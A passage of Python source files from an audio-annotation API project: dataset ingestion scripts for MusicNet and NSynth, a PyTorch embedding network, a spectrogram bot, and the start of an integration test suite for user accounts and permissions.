reader = DictReader(f)
for row in reader:
composer = slugify(row['composer'])
ensemble = slugify(row['ensemble'])
data = {
'tags': [composer, ensemble],
'title': f'{row["composition"]} {row["movement"]}'
}
metadata[row['id']] = data
return metadata
def get_annotations(filename, samplerate):
with open(filename, 'r') as f:
reader = DictReader(f)
for row in reader:
start_seconds = int(row['start_time']) / samplerate
stop_seconds = int(row['end_time']) / samplerate
duration_seconds = stop_seconds - start_seconds
note = midi_to_note(int(row['note']))
instrument = slugify(midi_instrument(int(row['instrument'])))
yield {
'start_seconds': start_seconds,
'duration_seconds': duration_seconds,
'tags': [
f'musical_note:{note}',
instrument,
]
}
def add_sounds(data_dir, labels_dir, metadata, tags):
for audio_filename in os.listdir(data_dir):
_id = os.path.splitext(audio_filename)[0]
data = metadata[_id]
audio_path = os.path.join(data_dir, audio_filename)
labels_path = os.path.join(labels_dir, f'{_id}.csv')
# push audio data to s3
with open(audio_path, 'rb') as f:
url = object_storage_client.put_object(_id, f, 'audio/wav')
logger.info(f'pushed {url} to s3')
with open(audio_path, 'rb') as f:
encoded = encode_mp3(f)
low_quality_id = os.path.join('low-quality', _id)
low_quality_url = object_storage_client.put_object(
low_quality_id, encoded, 'audio/mp3')
logger.info(f'pushed {low_quality_url} to s3')
# create a sound
info = soundfile.info(audio_path)
status, sound_uri, sound_id = annotate_client.create_sound(
audio_url=url,
low_quality_audio_url=low_quality_url,
info_url=info_url,
license_type='https://creativecommons.org/licenses/by/4.0',
title=data['title'],
duration_seconds=info.duration,
tags=tags)
if status == client.CREATED:
# create a full-length annotation with composer and ensemble tags
annotate_client.create_annotations(
sound_id,
{
'start_seconds': 0,
'duration_seconds': info.duration,
'tags': data['tags']
})
annotations = get_annotations(labels_path, info.samplerate)
# create annotations for all notes
annotate_client.create_annotations(sound_id, *annotations)
elif status == client.CONFLICT:
pass
else:
raise RuntimeError(f'Unexpected {status} encountered')
if __name__ == '__main__':
parser = argparse.ArgumentParser(parents=[
DatasetArgumentParser()
])
parser.add_argument(
'--train-only',
action='store_true',
default=False)
args = parser.parse_args()
annotate_client = Client(args.annotate_api_endpoint, logger=logger)
bucket_name = 'music-net'
info_url = 'https://homes.cs.washington.edu/~thickstn/musicnet.html'
object_storage_client = ObjectStorageClient(
endpoint=args.s3_endpoint,
region=args.s3_region,
access_key=args.aws_access_key_id,
secret=args.aws_secret_access_key,
bucket=bucket_name)
object_storage_client.ensure_bucket_exists()
with open('musicnet.md', 'r') as f:
about_me = f.read()
annotate_client.upsert_dataset(
user_name='musicnet',
email='<EMAIL>',
password=<PASSWORD>,
about_me=about_me,
info_url=info_url)
metadata = get_metadata(args.metadata_path)
if not args.train_only:
add_sounds(
os.path.join(args.metadata_path, 'test_data'),
os.path.join(args.metadata_path, 'test_labels'),
metadata,
['test'])
add_sounds(
os.path.join(args.metadata_path, 'train_data'),
os.path.join(args.metadata_path, 'train_labels'),
metadata,
['train'])
```
#### File: annotate-api/examples/nsynth_dataset.py
```python
import json
import argparse
from zounds.util import midi_to_note
import os
import soundfile
from client import Client
from cli import DatasetArgumentParser
from http import client
from s3client import ObjectStorageClient
from log import module_logger
from mp3encoder import encode_mp3
logger = module_logger(__file__)
def get_metadata(json_path):
with open(json_path, 'r') as f:
data = json.load(f)
processed = {}
for key, meta in data.items():
tags = meta['qualities_str']
tags.append(meta['instrument_family_str'])
tags.append(meta['instrument_source_str'])
tags.append('musical_note:' + midi_to_note(meta['pitch']))
tags.append('midi_velocity:' + str(meta['velocity']))
processed[key] = tags
return processed
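# Illustrative output (field names follow the NSynth examples.json layout): an
# acoustic guitar entry with qualities ['bright'], pitch 60 and velocity 100
# would map to tags like ['bright', 'guitar', 'acoustic',
# 'musical_note:' + midi_to_note(60), 'midi_velocity:100'].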
if __name__ == '__main__':
parser = argparse.ArgumentParser(parents=[
DatasetArgumentParser()
])
args = parser.parse_args()
annotate_client = Client(args.annotate_api_endpoint, logger=logger)
with open('nsynth.md', 'r') as f:
about_me = f.read()
info_url = 'https://magenta.tensorflow.org/datasets/nsynth'
annotate_client.upsert_dataset(
user_name='nsynth',
email='<EMAIL>',
password=args.password,
about_me=about_me,
info_url=info_url)
metadata = get_metadata(os.path.join(args.metadata_path, 'examples.json'))
bucket_name = 'nsynth'
object_storage_client = ObjectStorageClient(
endpoint=args.s3_endpoint,
region=args.s3_region,
access_key=args.aws_access_key_id,
secret=args.aws_secret_access_key,
bucket=bucket_name)
audio_path = os.path.join(args.metadata_path, 'audio')
object_storage_client.ensure_bucket_exists()
for filename in os.listdir(audio_path):
full_path = os.path.join(audio_path, filename)
key, _ = os.path.splitext(filename)
# push the audio data to s3
with open(full_path, 'rb') as f:
url = object_storage_client.put_object(key, f, 'audio/wav')
logger.info(f'Created s3 resource at {url}')
with open(full_path, 'rb') as f:
encoded = encode_mp3(f)
low_quality_key = os.path.join('low-quality', key)
low_quality_url = object_storage_client.put_object(
low_quality_key, encoded, 'audio/mp3')
logger.info(f'pushed {low_quality_url} to s3')
duration_seconds = soundfile.info(full_path).duration
status, sound_uri, sound_id = annotate_client.create_sound(
audio_url=url,
low_quality_audio_url=low_quality_url,
info_url='https://magenta.tensorflow.org/datasets/nsynth',
license_type='https://creativecommons.org/licenses/by/4.0',
title=key,
duration_seconds=duration_seconds,
# TODO: There is overlap between train and validation sets, so
# tags for all sounds need to be established up front, before
# records are created, as they are immutable
tags=['validation'])
if status == client.CREATED:
# If we've just created the sound resource, create the annotation
# as well
annotate_client.create_annotations(
sound_id,
{
'start_seconds': 0,
'duration_seconds': duration_seconds,
'tags': metadata[key]
})
logger.info(f'Sound and annotation for {sound_id} created')
elif status == client.CONFLICT:
logger.info('Sound and annotation already created')
else:
            raise RuntimeError(f'Unexpected {status} encountered')
```
#### File: annotate-api/examples/spatial_network.py
```python
import numpy as np
from torch import nn
import torch
from torch.nn import functional as F
from torch.nn.init import xavier_normal_, calculate_gain
from zounds.learn.util import \
batchwise_unit_norm, batchwise_mean_std_normalization
import zounds
class EmbeddingNetwork(nn.Module):
"""
Compute Log-scaled mel spectrogram, followed by a vanilla 2d convolutional
network with alternating convolutional and max pooling layers
"""
def __init__(self):
super(EmbeddingNetwork, self).__init__()
frequency_channels = 128
channels = frequency_channels
sr = zounds.SR11025()
interval = zounds.FrequencyBand.audible_range(sr)
scale = zounds.MelScale(interval, frequency_channels)
self.bank = zounds.learn.FilterBank(
samplerate=sr,
kernel_size=512,
scale=scale,
scaling_factors=np.linspace(0.1, 1.0, len(scale)),
normalize_filters=True,
a_weighting=True)
self.main = nn.Sequential(
nn.Conv2d(1, channels, (13, 3), padding=(7, 1), bias=False),
nn.MaxPool2d((2, 2), (2, 2), padding=(1, 1)),
nn.Conv2d(channels, channels, (13, 3), padding=(7, 1), bias=False),
nn.MaxPool2d((2, 2), (2, 2), padding=(1, 1)),
nn.Conv2d(channels, channels, (13, 3), padding=(7, 1), bias=False),
nn.MaxPool2d((2, 2), (2, 2), padding=(1, 1)),
nn.Conv2d(channels, channels, (13, 3), padding=(7, 1), bias=False),
nn.MaxPool2d((2, 2), (2, 2), padding=(1, 1)),
)
self.final = nn.Sequential(
nn.Linear(128, 64, bias=False),
nn.Linear(64, 32, bias=False),
nn.Linear(32, 16, bias=False),
nn.Linear(16, 8, bias=False),
)
self.linear = nn.Linear(8, 3, bias=False)
@classmethod
def load_network(cls, weights_file_path):
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
network = cls().to(device)
try:
# load network weights from a file on disk
state_dict = torch.load(weights_file_path)
network.load_state_dict(state_dict)
except IOError:
# There were no weights stored on disk. Initialize them
network.initialize_weights()
return network, device
def trainable_parameter_count(self):
model_parameters = filter(lambda p: p.requires_grad, self.parameters())
return sum([np.prod(p.size()) for p in model_parameters])
def to(self, *args, **kwargs):
self.bank = self.bank.to(*args, **kwargs)
return super(EmbeddingNetwork, self).to(*args, **kwargs)
def initialize_weights(self):
for m in self.main.parameters():
if m.data.dim() > 2:
xavier_normal_(m.data, calculate_gain('leaky_relu', 0.2))
for m in self.final.parameters():
if m.data.dim() > 2:
xavier_normal_(m.data, calculate_gain('leaky_relu', 0.2))
for m in self.linear.parameters():
if m.data.dim() > 2:
xavier_normal_(m.data, 1)
def forward(self, x):
# normalize
x = batchwise_mean_std_normalization(x)
# filter bank
x = self.bank(x, normalize=False)
# temporal pooling
x = F.avg_pool1d(x, 128, 64, padding=64)
# give zero mean and unit variance
x = zounds.learn.batchwise_mean_std_normalization(x)
        # view as 2d spectrogram "image", so dimensions are now
        # (batch, 1, 128, 128)
x = x[:, None, ...]
for m in self.main:
x = m(x)
x = F.leaky_relu(x, 0.2)
# global max pooling
x = F.max_pool2d(x, x.shape[2:])
        # flatten to (batch, channels) before the fully-connected layers
        x = x.view(-1, self.final[0].in_features)
for f in self.final:
x = f(x)
x = F.leaky_relu(x, 0.2)
x = self.linear(x)
x = batchwise_unit_norm(x)
return x
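# Minimal usage sketch: 'embedding_weights.dat' is a hypothetical path;
# load_network falls back to a fresh initialization when the file is missing,
# so this also runs without pre-trained weights.
if __name__ == '__main__':
    network, device = EmbeddingNetwork.load_network('embedding_weights.dat')
    print(f'trainable parameters: {network.trainable_parameter_count()}')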
```
#### File: annotate-api/examples/spectrogram_bot.py
```python
import requests
import zounds
from io import BytesIO
import numpy as np
from bot_helper import BinaryData, main, SoundListener
from log import module_logger
logger = module_logger(__file__)
N_FREQUENCY_BANDS = 512
SAMPLE_RATE = zounds.SR11025()
frequency_band = zounds.FrequencyBand(20, SAMPLE_RATE.nyquist)
scale = zounds.MelScale(frequency_band, N_FREQUENCY_BANDS)
FILTER_BANK_KERNEL_SIZE = 512
FILTER_BANK = zounds.spectral.morlet_filter_bank(
SAMPLE_RATE,
FILTER_BANK_KERNEL_SIZE,
scale,
scaling_factor=np.linspace(0.1, 1.0, len(scale)),
normalize=True)
FILTER_BANK *= zounds.AWeighting()
FILTER_BANK = np.array(FILTER_BANK)
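# FILTER_BANK now holds one A-weighted Morlet kernel per mel band, i.e. an
# array of shape (N_FREQUENCY_BANDS, FILTER_BANK_KERNEL_SIZE) that
# _process_samples below applies to each audio window via a dot product.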
class SpectrogramListener(SoundListener):
def __init__(self, client, s3_client, page_size=3, logger=None):
super().__init__(client, s3_client, page_size, logger)
def _process_samples(self, samples):
samples = samples.mono
samples = zounds.soundfile.resample(samples, SAMPLE_RATE)
windowing_sample_rate = zounds.SampleRate(
frequency=(FILTER_BANK_KERNEL_SIZE // 2) * SAMPLE_RATE.frequency,
duration=FILTER_BANK_KERNEL_SIZE * SAMPLE_RATE.frequency)
windowed = samples.sliding_window(windowing_sample_rate)
windowed = np.asarray(windowed)
spec = np.dot(FILTER_BANK, windowed.T).T
spec = np.abs(spec)
spec = 20 * np.log10(spec + 1)
spec = np.ascontiguousarray(spec).astype(np.float32)
spec = zounds.ArrayWithUnits(spec, [
zounds.TimeDimension(*windowing_sample_rate),
zounds.FrequencyDimension(scale)
])
binary_data = BinaryData(spec)
return binary_data
def _process_sound(self, sound):
# fetch audio
resp = requests.get(sound['audio_url'])
raw_audio = BytesIO(resp.content)
# processing pipeline to compute spectrograms
samples = zounds.AudioSamples.from_file(raw_audio).mono
binary_data = self._process_samples(samples)
# push output to s3
data_url = self.s3_client.put_object(
sound['id'],
binary_data.packed_file_like_object(),
'application/octet-stream')
logger.info(f'pushed binary data to {data_url}')
# create annotation
self.client.create_annotations(sound['id'], {
'start_seconds': 0,
'duration_seconds': sound['duration_seconds'],
'data_url': data_url
})
logger.info('created annotation')
if __name__ == '__main__':
main(
user_name='spectrogram_bot',
bucket_name='spectrogram-bot',
email='<EMAIL>',
about_me='spectrogram_bot.md',
info_url='https://en.wikipedia.org/wiki/Spectrogram',
listener_cls=SpectrogramListener,
logger=logger)
```
#### File: JohnVinyard/annotate-api/tests.py
```python
import unittest2
import requests
import subprocess
from http import client
import time
import os
import uuid
path, fn = os.path.split(__file__)
class BaseTests(object):
def _user_create_data(
self,
user_name=None,
password=None,
user_type=None,
email=None,
about_me=None):
return {
'user_name': 'user' if user_name is None else user_name,
'password': 'password' if password is None else password,
'user_type': user_type or 'human',
'email': '<EMAIL>' if email is None else email,
'about_me': about_me or 'Up and coming tennis star'
}
def _get_auth(self, user_create_data):
return user_create_data['user_name'], user_create_data['password']
def create_user(
self,
user_type='human',
user_name=None,
email=None,
about_me=None):
create_data = self._user_create_data(
user_name=user_name or uuid.uuid4().hex,
password=uuid.uuid4().hex,
user_type=user_type,
            email=email or '<EMAIL>'.format(uuid.uuid4().hex),
about_me=about_me or uuid.uuid4().hex
)
create_resp = requests.post(self.users_resource(), json=create_data)
self.assertEqual(client.CREATED, create_resp.status_code)
location = create_resp.headers['location']
return create_data, location
def sound_data(
self,
info_url=None,
audio_url=None,
license_type=None,
title=None,
duration_seconds=None,
tags=None,
low_quality_audio_url=None):
if audio_url is None:
audio_url = 'https://archive.org/download/Greatest_Speeches_of_the_20th_Century/AbdicationAddress.ogg'
if low_quality_audio_url is None:
low_quality_audio_url = audio_url
return dict(
info_url=info_url or 'https://archive.org/details/Greatest_Speeches_of_the_20th_Century',
audio_url=audio_url,
license_type=license_type or 'https://creativecommons.org/licenses/by/4.0',
title='Abdication Address - King Edward VIII' if title is None else title,
duration_seconds=duration_seconds or (6 * 60) + 42,
tags=tags,
low_quality_audio_url=low_quality_audio_url)
def annotation_data(
self,
tags=None,
data_url=None,
start_seconds=1,
duration_seconds=1):
return dict(
start_seconds=start_seconds,
duration_seconds=duration_seconds,
tags=tags,
data_url=data_url)
def _create_sound_with_user(self, auth, tags=None):
sound_id = uuid.uuid4().hex
sound_data = self.sound_data(
audio_url=f'https://example.com/{sound_id}', tags=tags)
resp = requests.post(
self.sounds_resource(), json=sound_data, auth=auth)
return resp.headers['location'].split('/')[-1]
def _create_sounds_with_user(self, auth, n_sounds, tags=None, delay=None):
for _ in range(n_sounds):
self._create_sound_with_user(auth, tags=tags)
if delay:
time.sleep(delay)
@classmethod
def startup_executable(cls):
return os.path.join(path, 'start.sh')
@classmethod
def stop_executable(cls):
return os.path.join(path, 'stop.sh')
@classmethod
def url(cls, path=''):
return 'http://localhost{path}'.format(**locals())
@classmethod
def root_resource(cls):
return cls.url()
@classmethod
def users_resource(cls, user_id=''):
return cls.url(f'/users/{user_id}')
@classmethod
def sounds_resource(cls, sound_id=''):
return cls.url(f'/sounds/{sound_id}')
@classmethod
def user_sounds_resource(cls, user_id=''):
return cls.url(f'/users/{user_id}/sounds')
@classmethod
def user_annotations_resource(cls, user_id=''):
return cls.url(f'/users/{user_id}/annotations')
@classmethod
def sound_annotations_resource(cls, sound_id=''):
return cls.url(f'/sounds/{sound_id}/annotations')
@classmethod
def annotations_resource(cls):
return cls.url('/annotations')
@classmethod
def delete_all_data(cls):
requests.delete(cls.root_resource())
@classmethod
def _health_check(cls):
for i in range(90):
time.sleep(1)
print('try number {i}'.format(**locals()))
try:
resp = requests.get(cls.root_resource())
resp.raise_for_status()
break
except (requests.HTTPError, requests.ConnectionError):
pass
@classmethod
def setUpClass(cls):
cls.process = subprocess.Popen([cls.startup_executable()], shell=True)
cls._health_check()
cls.delete_all_data()
@classmethod
def tearDownClass(cls):
cls.delete_all_data()
cls.process.terminate()
cls.process = subprocess.Popen(
[cls.stop_executable()], shell=True)
class SmokeTests(BaseTests, unittest2.TestCase):
"""
Basic tests to ensure that the API is up and responding to requests
"""
def tearDown(self):
self.delete_all_data()
def setUp(self):
self.resp = requests.get(self.root_resource())
def test_status_code_is_ok(self):
self.assertEqual(self.resp.status_code, client.OK)
def test_includes_sound_and_annotation_counts(self):
data = self.resp.json()
self.assertIn('totalSounds', data)
self.assertIn('totalAnnotations', data)
self.assertIn('totalUsers', data)
def test_root_resource_includes_cors_headers(self):
self.assertIn('Access-Control-Allow-Origin', self.resp.headers)
class UserTests(BaseTests, unittest2.TestCase):
"""
Tests to ensure user CRUD operations, including validation
"""
def tearDown(self):
self.delete_all_data()
def _get_links(self, user_type):
create_data = self._user_create_data(user_type=user_type)
create_resp = requests.post(self.users_resource(), json=create_data)
self.assertEqual(client.CREATED, create_resp.status_code)
uri = create_resp.headers['location']
user_resp = requests.get(
self.url(uri), auth=self._get_auth(create_data))
self.assertEqual(client.OK, user_resp.status_code)
return user_resp.json()['links']
def test_human_resource_should_include_link_to_owned_sounds(self):
links = self._get_links('human')
mapped = {l['rel']: l for l in links}
self.assertIn('sounds', mapped)
def test_human_resource_should_include_link_to_owned_annotations(self):
links = self._get_links('human')
mapped = {l['rel']: l for l in links}
self.assertIn('annotations', mapped)
def test_dataset_resource_should_include_link_to_owned_sounds(self):
links = self._get_links('dataset')
mapped = {l['rel']: l for l in links}
self.assertIn('sounds', mapped)
def test_dataset_resource_should_include_link_to_owned_annotations(self):
links = self._get_links('dataset')
mapped = {l['rel']: l for l in links}
self.assertIn('annotations', mapped)
def test_featurebot_resource_should_include_link_to_owned_annotations(self):
links = self._get_links('featurebot')
mapped = {l['rel']: l for l in links}
self.assertIn('annotations', mapped)
self.assertNotIn('sounds', mapped)
def test_aggregator_resource_should_include_no_links(self):
links = self._get_links('aggregator')
mapped = {l['rel']: l for l in links}
self.assertNotIn('sounds', mapped)
self.assertNotIn('annotations', mapped)
def test_user_resource_supports_cors(self):
resp = requests.options(self.users_resource())
self.assertIn('Access-Control-Allow-Origin', resp.headers)
def test_can_create_and_fetch_new_user(self):
create_data = self._user_create_data(user_name='HalIncandenza')
create_resp = requests.post(self.users_resource(), json=create_data)
self.assertEqual(client.CREATED, create_resp.status_code)
uri = create_resp.headers['location']
_id = uri.split('/')[-1]
user_resp = requests.get(
self.url(uri), auth=self._get_auth(create_data))
self.assertEqual(client.OK, user_resp.status_code)
self.assertEqual(
user_resp.json()['user_name'], create_data['user_name'])
self.assertEqual(user_resp.json()['id'], _id)
def test_can_get_user_by_username(self):
user_name = 'HalIncandenza'
user1, user1_location = self.create_user(user_name=user_name)
user2, user2_location = self.create_user()
resp = requests.get(
self.users_resource(user_name), auth=self._get_auth(user2))
self.assertEqual(client.OK, resp.status_code)
self.assertEqual(user1_location, resp.headers['location'])
def test_can_head_user_by_username(self):
user_name = 'HalIncandenza'
user1, user1_location = self.create_user(user_name=user_name)
user2, user2_location = self.create_user()
resp = requests.head(
self.users_resource(user_name), auth=self._get_auth(user2))
self.assertEqual(client.NO_CONTENT, resp.status_code)
def test_get_non_existent_username_returns_not_found(self):
user_name = 'HalIncandenza'
user1, user1_location = self.create_user(user_name=user_name)
user2, user2_location = self.create_user()
resp = requests.get(
self.users_resource(user_name + 'X'), auth=self._get_auth(user2))
self.assertEqual(client.NOT_FOUND, resp.status_code)
def test_head_non_existent_username_returns_not_found(self):
user_name = 'HalIncandenza'
user1, user1_location = self.create_user(user_name=user_name)
user2, user2_location = self.create_user()
resp = requests.head(
self.users_resource(user_name + 'X'), auth=self._get_auth(user2))
self.assertEqual(client.NOT_FOUND, resp.status_code)
def test_can_head_user(self):
user1, user1_location = self.create_user()
user2, user2_location = self.create_user()
resp = requests.head(
self.url(user2_location), auth=self._get_auth(user1))
self.assertEqual(client.NO_CONTENT, resp.status_code)
def test_head_returns_not_found_for_non_existent_user(self):
user1, user1_location = self.create_user()
resp = requests.head(
self.users_resource('1234'), auth=self._get_auth(user1))
self.assertEqual(client.NOT_FOUND, resp.status_code)
def test_unauthorized_when_attempting_to_list_users_without_creds(self):
list_users_resp = requests.get(self.users_resource())
self.assertEqual(list_users_resp.status_code, client.UNAUTHORIZED)
def test_can_page_through_users(self):
requesting_user, _ = self.create_user()
for _ in range(95):
self.create_user()
resp = requests.get(
self.users_resource(),
params={'page_size': 10},
auth=self._get_auth(requesting_user))
self.assertEqual(client.OK, resp.status_code)
resp_data = resp.json()
self.assertEqual(10, len(resp_data['items']))
self.assertEqual(96, resp_data['total_count'])
items = [resp_data['items']]
while 'next' in resp_data:
current = requests.get(
self.url(resp_data['next']),
auth=self._get_auth(requesting_user))
resp_data = current.json()
items.append(resp_data['items'])
self.assertEqual(10, len(items))
self.assertEqual(6, len(items[-1]))
self.assertEqual(96, sum(len(item) for item in items))
def test_can_page_through_users_and_filter_by_user_type(self):
requesting_user, _ = self.create_user()
for _ in range(10):
self.create_user(user_type='human')
for _ in range(10):
self.create_user(user_type='featurebot')
resp = requests.get(
self.users_resource(),
params={'page_size': 3, 'user_type': 'featurebot'},
auth=self._get_auth(requesting_user))
self.assertEqual(client.OK, resp.status_code)
resp_data = resp.json()
self.assertEqual(3, len(resp_data['items']))
self.assertEqual(10, resp_data['total_count'])
items = [resp_data['items']]
while 'next' in resp_data:
current = requests.get(
self.url(resp_data['next']),
auth=self._get_auth(requesting_user))
resp_data = current.json()
items.append(resp_data['items'])
self.assertEqual(4, len(items))
self.assertEqual(1, len(items[-1]))
self.assertEqual(10, sum(len(item) for item in items))
def test_can_filter_users_by_user_name(self):
requesting_user, _ = self.create_user()
auth = self._get_auth(requesting_user)
for _ in range(10):
self.create_user(user_type='human')
user_name = 'interesting_user'
self.create_user(user_name=user_name)
resp = requests.get(
self.users_resource(),
params={'page_size': 100, 'user_name': user_name},
auth=auth)
self.assertEqual(client.OK, resp.status_code)
data = resp.json()
self.assertEqual(1, len(data['items']))
self.assertEqual(1, data['total_count'])
self.assertEqual(user_name, data['items'][0]['user_name'])
def test_can_view_most_data_about_self_when_listing_users(self):
user1, user1_location = self.create_user()
user2, user2_location = self.create_user()
requesting_user_auth = self._get_auth(user1)
resp = requests.get(
self.users_resource(),
params={'page_size': 3},
auth=requesting_user_auth)
self.assertEqual(client.OK, resp.status_code)
resp_data = resp.json()
self.assertEqual(2, resp_data['total_count'])
self.assertEqual(2, len(resp_data['items']))
self.assertEqual(user1['email'], resp_data['items'][1]['email'])
def test_can_view_limited_data_about_other_user_when_listing_users(self):
user1, user1_location = self.create_user()
user2, user2_location = self.create_user()
requesting_user_auth = self._get_auth(user1)
resp = requests.get(
self.users_resource(),
params={'page_size': 3},
auth=requesting_user_auth)
self.assertEqual(client.OK, resp.status_code)
resp_data = resp.json()
self.assertEqual(2, resp_data['total_count'])
self.assertEqual(2, len(resp_data['items']))
self.assertNotIn('email', resp_data['items'][0])
def test_bad_request_when_filtering_by_invalid_user_type(self):
requesting_user, _ = self.create_user()
resp = requests.get(
self.users_resource(),
params={'page_size': 3, 'user_type': 'animal'},
auth=self._get_auth(requesting_user))
self.assertEqual(client.BAD_REQUEST, resp.status_code)
def test_bad_request_when_page_size_is_negative(self):
requesting_user, _ = self.create_user()
resp = requests.get(
self.users_resource(),
params={'page_size': -3, 'user_type': 'human'},
auth=self._get_auth(requesting_user))
self.assertEqual(client.BAD_REQUEST, resp.status_code)
def test_bad_request_when_page_size_is_too_large(self):
requesting_user, _ = self.create_user()
resp = requests.get(
self.users_resource(),
params={'page_size': 10000, 'user_type': 'human'},
auth=self._get_auth(requesting_user))
self.assertEqual(client.BAD_REQUEST, resp.status_code)
def test_can_view_most_data_about_self(self):
user1, user1_location = self.create_user()
resp = requests.get(
self.url(user1_location), auth=self._get_auth(user1))
self.assertIn('email', resp.json())
self.assertNotIn('password', resp.json())
def test_can_view_limited_data_about_other_user(self):
user1, user1_location = self.create_user()
user2, user2_location = self.create_user()
resp = requests.get(
self.url(user1_location), auth=self._get_auth(user2))
self.assertNotIn('email', resp.json())
self.assertNotIn('password', resp.json())
def test_can_delete_self(self):
user1, user1_location = self.create_user()
user2, user2_location = self.create_user()
auth = self._get_auth(user1)
uri = self.url(user1_location)
resp = requests.get(uri, auth=auth)
self.assertEqual(user1['email'], resp.json()['email'])
delete_resp = requests.delete(uri, auth=auth)
self.assertEqual(client.OK, delete_resp.status_code)
get_resp = requests.get(uri, auth=self._get_auth(user2))
self.assertEqual(client.NOT_FOUND, get_resp.status_code)
def test_cannot_delete_other_user(self):
user1, user1_location = self.create_user()
user2, user2_location = self.create_user()
auth = self._get_auth(user1)
uri = self.url(user1_location)
resp = requests.get(uri, auth=auth)
self.assertEqual(user1['email'], resp.json()['email'])
delete_resp = requests.delete(uri, auth=self._get_auth(user2))
self.assertEqual(client.FORBIDDEN, delete_resp.status_code)
def test_not_found_when_deleting_non_existent_user(self):
user1, user1_location = self.create_user()
delete_resp = requests.delete(
self.users_resource('1234'), auth=self._get_auth(user1))
self.assertEqual(client.NOT_FOUND, delete_resp.status_code)
def test_unauthorized_when_deleting_user_without_creds(self):
delete_resp = requests.delete(self.users_resource('1234'))
self.assertEqual(client.UNAUTHORIZED, delete_resp.status_code)
def test_unauthorized_when_fetching_single_user_without_creds(self):
user1, user1_location = self.create_user()
user_resp = requests.get(self.url(user1_location))
self.assertEqual(client.UNAUTHORIZED, user_resp.status_code)
def test_validation_error_for_bad_user_type(self):
user1_data = self._user_create_data(user_type='animal')
resp = requests.post(self.users_resource(), json=user1_data)
self.assertEqual(client.BAD_REQUEST, resp.status_code)
desc = resp.json()['description']
self.assertEqual('user_type', desc[0][0])
def test_validation_error_for_bad_user_name(self):
user1_data = self._user_create_data(user_name='')
resp = requests.post(self.users_resource(), json=user1_data)
self.assertEqual(client.BAD_REQUEST, resp.status_code)
desc = resp.json()['description']
self.assertEqual(1, len(desc))
self.assertEqual('user_name', desc[0][0])
def test_validation_error_for_bad_password(self):
user1_data = self._user_create_data(password='')
resp = requests.post(self.users_resource(), json=user1_data)
self.assertEqual(client.BAD_REQUEST, resp.status_code)
desc = resp.json()['description']
print(resp.json())
self.assertEqual(1, len(desc))
self.assertEqual('password', desc[0][0])
def test_validation_error_for_bad_email(self):
user1_data = self._user_create_data(email='')
resp = requests.post(self.users_resource(), json=user1_data)
self.assertEqual(client.BAD_REQUEST, resp.status_code)
desc = resp.json()['description']
self.assertEqual(1, len(desc))
self.assertEqual('email', desc[0][0])
def test_validation_error_has_information_about_multiple_problems(self):
user1_data = self._user_create_data(user_name='', email='')
resp = requests.post(self.users_resource(), json=user1_data)
self.assertEqual(client.BAD_REQUEST, resp.status_code)
desc = resp.json()['description']
self.assertEqual(2, len(desc))
fields = set(d[0] for d in desc)
self.assertIn('user_name', fields)
self.assertIn('email', fields)
def test_usernames_must_be_unique(self):
user1_data = self._user_create_data(
user_name='user1', email='<EMAIL>')
resp = requests.post(self.users_resource(), json=user1_data)
self.assertEqual(client.CREATED, resp.status_code)
user2_data = self._user_create_data(
user_name='user1', email='<EMAIL>')
resp2 = requests.post(self.users_resource(), json=user2_data)
self.assertEqual(client.CONFLICT, resp2.status_code)
def test_email_addresses_must_be_unique(self):
user1_data = self._user_create_data(
user_name='user1', email='<EMAIL>')
resp = requests.post(self.users_resource(), json=user1_data)
self.assertEqual(client.CREATED, resp.status_code)
user2_data = self._user_create_data(
user_name='user2', email='<EMAIL>')
resp2 = requests.post(self.users_resource(), json=user2_data)
self.assertEqual(client.CONFLICT, resp2.status_code)
def test_location_header_is_included_when_conflict_is_encountered(self):
user1_data = self._user_create_data(
user_name='user1', email='<EMAIL>')
resp = requests.post(self.users_resource(), json=user1_data)
self.assertEqual(client.CREATED, resp.status_code)
expected_location = resp.headers['location']
user2_data = self._user_create_data(
user_name='user2', email='<EMAIL>')
resp2 = requests.post(self.users_resource(), json=user2_data)
self.assertEqual(expected_location, resp2.headers['location'])
def test_can_update_about_me_text(self):
user1, user1_location = self.create_user(
user_type='human', about_me='original')
auth = self._get_auth(user1)
resp = requests.patch(
self.url(user1_location), json={'about_me': 'modified'}, auth=auth)
self.assertEqual(client.OK, resp.status_code)
resp = requests.get(
self.url(user1_location), auth=auth)
self.assertEqual('modified', resp.json()['about_me'])
def test_cannot_update_other_user(self):
user1, user1_location = self.create_user()
user2, user2_location = self.create_user()
auth = self._get_auth(user1)
resp = requests.patch(
self.url(user2_location), json={'about_me': 'modified'}, auth=auth)
self.assertEqual(client.FORBIDDEN, resp.status_code)
def test_invalid_about_me_update_for_featurebot_fails(self):
user1, user1_location = self.create_user(
user_type='dataset', about_me='original')
auth = self._get_auth(user1)
resp = requests.patch(
self.url(user1_location), json={'about_me': ''}, auth=auth)
self.assertEqual(client.BAD_REQUEST, resp.status_code)
def test_invalid_about_me_update_for_dataset_fails(self):
user1, user1_location = self.create_user(
user_type='featurebot', about_me='original')
auth = self._get_auth(user1)
resp = requests.patch(
self.url(user1_location), json={'about_me': ''}, auth=auth)
self.assertEqual(client.BAD_REQUEST, resp.status_code)
def test_can_update_password(self):
user1, user1_location = self.create_user(
user_type='human', about_me='original')
auth = self._get_auth(user1)
resp = requests.patch(
self.url(user1_location), json={'password': '<PASSWORD>'}, auth=auth)
self.assertEqual(client.OK, resp.status_code)
# using the original password
resp = requests.get(
self.url(user1_location), auth=auth)
self.assertEqual(client.UNAUTHORIZED, resp.status_code)
# using the new password
new_auth = (user1['user_name'], 'modified')
resp = requests.get(
self.url(user1_location), auth=new_auth)
self.assertEqual(client.OK, resp.status_code)
self.assertEqual(user1['email'], resp.json()['email'])
def test_cannot_update_username(self):
user1, user1_location = self.create_user()
auth = self._get_auth(user1)
resp = requests.patch(
self.url(user1_location), json={'user_name': 'modified'}, auth=auth)
self.assertEqual(client.BAD_REQUEST, resp.status_code)
def test_cannot_update_email(self):
user1, user1_location = self.create_user()
auth = self._get_auth(user1)
resp = requests.patch(
self.url(user1_location), json={'email': 'modified'}, auth=auth)
self.assertEqual(client.BAD_REQUEST, resp.status_code)
def test_not_found_for_non_existent_user(self):
user1, user1_location = self.create_user()
user_resp = requests.get(
self.users_resource('1234'), auth=self._get_auth(user1))
self.assertEqual(client.NOT_FOUND, user_resp.status_code)
def test_unauthorized_when_fetching_non_existent_user_without_creds(self):
user_resp = requests.get(self.users_resource('1234'))
self.assertEqual(client.UNAUTHORIZED, user_resp.status_code)
class SoundTests(BaseTests, unittest2.TestCase):
def tearDown(self):
self.delete_all_data()
def test_dataset_can_create_sound(self):
